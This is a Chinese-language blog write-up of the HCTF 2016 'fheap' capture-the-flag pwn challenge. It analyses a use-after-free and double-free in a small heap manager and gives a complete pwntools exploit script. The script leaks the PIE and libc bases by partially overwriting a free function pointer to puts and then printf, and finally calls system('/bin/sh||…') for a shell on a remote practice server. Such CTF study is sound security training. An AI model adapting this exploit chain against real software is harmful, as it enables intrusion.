2016 HCTF fheap writeup

最新推荐文章于 2024-10-05 19:08:20 发布
最新推荐文章于 2024-10-05 19:08:20 发布
阅读量378 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43921239/article/details/108569773
版权

基本情况

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

基本功能

阉割版堆管理器,有增删功能。

// 管理堆的结构体
struct
{
    int inuse;
    String *str;
} Strings[0x10];

// 堆结构体
typedef struct String
{
    union {
        char *buf;
        char array[16];
    } o;
    int len;
    void (*free)(struct String *ptr);
} String;

create string 有两种不同方式来储存字符串:

  1. 字符串块 < 16 , 在结构体堆块(String)上存放输入的字符串。

  2. 字符串块>=16 , malloc 一个输入的字符串长度 size 的空间, 将该空间地址存放在原来的堆块中。

    注意是 malloc 输入的字符串长度 ,而不是输入的 size 。自行根据源码分析:

    nbytesa = strlen(&buf);
if ( nbytesa > 15 )
{
    dest = (char *)malloc(nbytesa);

结构体堆块(String)最后 8 个字节存放的是 free_func 函数地址,用来在 delete 的时候调用,这样的设计与上面例子一致。字符串块两种情况对应两种不同的 free_func 。

delete string 根据输入下标释放 chunk 。

漏洞

delete 操作释放 chunk 后,没有将相关索引指针置零,而且没有对 chunk 状态进行严格限制,仅仅限制下标范围,以及查询索引指针是否存在,并没有检查 inuse 位,造成 UAFDouble free

思路

  1. 利用 UAF 控制结构体堆块(String)最后 8 字节,修改 free_func 为 puts 函数地址。释放 chunk 泄露函数真实地址,通过计算得出程序加载基地址。完成绕过 PIE 保护。
  2. 再次 UAF 控制结构体堆块(String)函数地址为 printf 函数,构造出格式化字符串漏洞,泄露栈上位于 libc 段的地址,完成 libc 地址泄露。
  3. 第三次 UAF 控制结构体堆块(String)函数地址为 system 函数,利用 Linux 命令行特性 || 完成 getshell

UAF 控制思路和例题差不多,但是一个问题。如果使用一样的 UAF 利用方法会出现问题:

add(0x30,'a'*0x30)#0
add(0x30,'a'*0x30)#1
delete(1)
delete(0)
add(0x18,'b'*0x18)

这样不能达到预期效果,新堆的 string chunk 用的不是 chunk0 结构体,而是继续使用 chunk2 string chunk 。后续试过申请大小各种 string chunk 都是一样情况。

所以采用申请两个小堆(字符串长度小于 16),然后新堆申请一个 0x20 大小空间存放 string ,这样 string 就会使用 chunk1 结构体堆。

add(8,'a'*8)
add(8,'b'*8)
delete(1)
delete(0)

在 free_short 附近找到 call puts 的地址:0xd2d 。然后使用 partial write 将 free_func 最低一个字节修改为 0x2d 。释放 chunk1 ,将 chunk1 结构体内容输入,从而泄露函数地址,计算出程序加载基地址。

call_puts_addr = 0xd2d
payload = 'a'*0x18 + p64(call_puts_addr)[0]
add(len(payload),payload)

delete(1)
p.recvuntil('a'*0x18)
elf_base = u64(p.recv(6).ljust(8,'\x00'))-call_puts_addr

释放 chunk0 方便我们重复利用这两个堆,然后重复上面步骤找到 call printf :0xDBB 。需要将格式化字符串在申请堆时写入在开头。偏移地址 gdb 调试找到一个 libc 内的地址即可。

delete(0)
payload = '%22$p'.ljust(0x18,'a') + p64(0xDBB)[0]
add(len(payload),payload)
delete(1)

这步结束后会卡输入流,输入两行字符即可:

p.sendline('skye')
p.sendline('skye')

再次释放 chunk0 并申请,这次将函数地址修改为 system 地址,/bin/sh 输入在开头。由于程序输入函数不能读入 \x00 ,所以用 || 分隔填充内容,原因如下:

分隔符说明
&&第2条命令只有在第1条命令成功执行之后才执行
||只有||前的命令执行不成功(产生了一个非0的退出码)时,才执行后面的命令。
当;号前的命令执行完, 不管是否执行成功,执行;后的命令

EXP

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : MrSkYe
# @Email   : skye231@foxmail.com
# @File    : pwn-f.py
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
# p = process("./pwn-f")
p = remote("node3.buuoj.cn",29256)
elf = ELF("./pwn-f")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def add(size,content):
	p.recvuntil("3.quit\n")
	p.sendline("create string")
	p.recvuntil("size:")
	p.sendline(str(size))
	p.recvuntil("str:")
	p.send(content)
def delete(id):
	p.recvuntil("3.quit\n")
	p.sendline("delete string")
	p.recvuntil("id:")
	p.sendline(str(id))
	p.recvuntil("sure?:")
	p.sendline('yes')

# UAF
add(8,'a'*8)
add(8,'b'*8)
delete(1)
delete(0)

# overwrite free_func 2 puts
call_puts_addr = 0xd2d
payload = 'a'*0x18 + p64(call_puts_addr)[0]
add(len(payload),payload)

# leak libc
delete(1)
p.recvuntil('a'*0x18)
elf_base = u64(p.recv(6).ljust(8,'\x00'))-call_puts_addr
log.info("elf_base:"+hex(elf_base))
# printf_plt = elf_base + elf.plt['printf']
# log.info("printf_plt:"+hex(printf_plt))

# overwrite 2 printf leak libc
delete(0)
payload = '%22$p'.ljust(0x18,'a') + p64(0xDBB)[0]
add(len(payload),payload)
delete(1)
leak_addr = int(p.recv(14),16)
log.info("leak_addr:"+hex(leak_addr))
libc_addr = leak_addr - 0x78c0f
log.info("libc_addr:"+hex(libc_addr))
system_addr = libc_addr + libc.sym['system']
log.info("system_addr:"+hex(system_addr))
str_binsh = libc_addr + libc.search('/bin/sh').next()
log.info("str_binsh:"+hex(str_binsh))
# one = [0x45226,0x4527a,0xf0364,0xf1207]
# onegadget = one[0] + libc_addr
# log.info("onegadget:"+hex(onegadget))

p.sendline('skye')
p.sendline('skye')

# system('/bin/sh||aaa……')
delete(0)
payload = '/bin/sh||'.ljust(0x18,'a') + p64(system_addr)
add(len(payload),payload)

# gdb.attach(p,'b *$rebase(0x2020C0)')
# # gdb.attach(p,'b *$rebase(0xDBB)')
delete(1)


p.interactive()

其他解法

SkYe231_
关注
2016 hctf fheap
BadRer的博客
06-10 552
2016 hctf fheap 前言 好久没写东西了,本想着简单记录一下,不过在做这题的时候,弄懂了之前困扰许多的问题,所以就多写一些吧,在此感谢俺的女票@曙雀 UAF IDA分析后,得到数据结构如下。 note: 00000000 note struc ; (sizeof=0x20, mappedto_9) 00000000 content_ptr dq ? 00000008 field_8 dq ? 00000010 str_size dd ?
【学习笔记】CTF PWN选手的养成(三)
prettyX的博客
12-04 1362
atum大佬视频的总结 第三章 课时2 堆漏洞的利用技巧 0X01 基础知识 1、操作系统中的内存布局(Linux) 内核空间&用户空间,堆、栈等;cat /proc/pid/maps 要了解ELF文件结构 2、什么是堆? 数据结构:父节点总大于/小于子节点的特殊的完全二叉树 操作系统:程序在运行时动态申请和释放的内存空间(malloc,realloc,free,new,d...
HCTF 2016 fheap
Bill
03-11 2187
HCTF 2016 fheap 一. 源码 fheap.c 二. 题目分析 1. 程序的生成 假设我们的源码文件名叫做fheap.c gcc fheap.c -pie -fpic -o fheap strip fheap 其中-fpic是辅助-pie, 没有-fpic将会编译失败. strip是去除符号表(Discard symbols from obje...
2016 hctf fheap 题解
abc380620175的博客
03-27 574
题目链接 https://github.com/zh-explorer/hctf2016-fheap 题目分析 题目功能只有 malloc 和 free 的功能,查看堆的布局: 全局指针没有置空,导致 uaf 和 double free 漏洞,两种都可以做,但是这题的重点是绕过 PIE。 double free 完了之后,会导致下面的情况 这里需要注意一下 create 函数的...
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 194
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
hctf2016-fheap
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
【学习笔记】CTF PWN选手的养成(一)
prettyX的博客
11-20 2270
在ichunqiu上看的视频,对学习内容进行整理,对Atum老师表示感谢。 第一章 基础知识 0X01 PWN 简介 软件安全:软件安全专注于研究软件的设计和实现的安全 研究对象:代码(源码、字节码、汇编等) 研究目标:发掘漏洞、利用漏洞、修补漏洞 研究技术:逆向工程、漏洞挖掘与利用、漏洞防御技术 CTF PWN:软件安全研究的一个缩影 研究对象:可执行文件,主要是ELF文件 研究...
【学习笔记】CTF PWN选手的养成(二)
prettyX的博客
11-25 2002
第三章 漏洞利用技术 课时1 栈溢出-这些都是套路 0X01 基础知识 1、寄存器:rsp/esp、rbp/ebp等 2、栈: 3、函数调用:call、ret 4、调用约定: __stdcall、__cdecl、__fastcall、__thiscall、__nakedcall、__pascal 5、参数传递:取决于调用约定,默认如下 X86从右向左入栈 X64优先寄存器,参数过...
HCTF 2016 fheap 做题笔记
fa1c4的blog
08-21 615
前言 一道UAF题, HCTF 2016 - fheap ctfhub搜fheap 过程 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[1032]; // [rsp+0h] [rbp-410h] BYREF unsigned __int64 v5; // [rsp+408h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL); setbu
hctf2016_fheap(partial write)
seaaseesa的博客
06-10 606
hctf2016_fheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,add函数中,如果字符串长度大于15,则单独malloc一块内存存放字符串,否则直接存结点里。 Delete功能没有清空指针,因此,存在UAF, 我们可以第字节将节点里的free代理函数指针修改掉,利用低字节覆盖,使其指向printf函数plt表,这样,当我们用UAF去delete这个堆时,就会调用printf,这样我们可以利用格式化字符串去泄露数据。然后就可以利用UAF,去执行system函数了。
hctf2016 fheap学习(FreeBuf发表的官方解法)
weixin_30664615的博客
12-10 226
目录 如何在二次释放前修改函数指针 修改函数指针流程 如何获得进程的加载基址 puts函数的调用 如何获取system函数地址 说一下用DlyELF函数 如何调用system函数 ROP需要的栈布局 read函数的妙用 参数”/bin/sh”如何传递过去 参考...
CTF新生赛之Writeup
shikaku_的博客
11-27 6430
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
puts函数泄露地址
Sakura给爷pwn全场
12-17 1077
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址): https://www.freesion.com/article/5901691025/ 利用puts函数泄露libc内存信息: https://www.it610.com/article/1296102748638486528.htm
CTF的write-up总结
m0_57836225的博客
08-22 1219
总之,CTF write-up 应该清晰地记录解题过程,分享关键技术和经验教训,以便自己和他人在以后的比赛中能够更好地应对类似的题目。- 分析可能存在的漏洞,如 SQL 注入、XSS、文件上传漏洞等,并阐述如何利用这些漏洞获取关键信息或权限提升。2. 介绍使用的工具和技术,如特定的漏洞扫描工具、加密破解工具、逆向工程工具等,并说明它们的作用和使用方法。1. 通过这道题目,对 SQL 注入和文件上传漏洞有了更深入的理解,同时也熟悉了相关的工具使用。
[CTF]WriteUp第1篇
最新发布
poiiuytree233的博客
10-05 774
[MRCTF2020]你传你🐎呢 [网鼎杯 2020 青龙组]AreUSerialz [CISCN2019 华北赛区 Day2 Web1]Hack World
CTF 竞赛Writeup
qq_63613566的博客
04-19 812
熟练应用AAPR软件,快速辨别加解密类型,仔细阅读题目。熟练应用Wireshark软件,仔细阅读题目。熟练应用Winhex软件,仔细阅读题目。2. 追踪TCP流,即可找到FTP密码。1.使用Wireshark打开所给的。熟练应用AAPR软件,仔细阅读题目。文件,找到request:PASS。熟练应用HxD软件,仔细阅读题目。3.打开压缩文件,得到flag。提示2:找到FTP密码即可。密码:cdts3500。
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 3099
2023第五届 Real World CTF 体验赛 Writeup(web)
Using After Free
Grxer的博客
03-20 169
总之就是free后没有将指针置为null造成的,我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值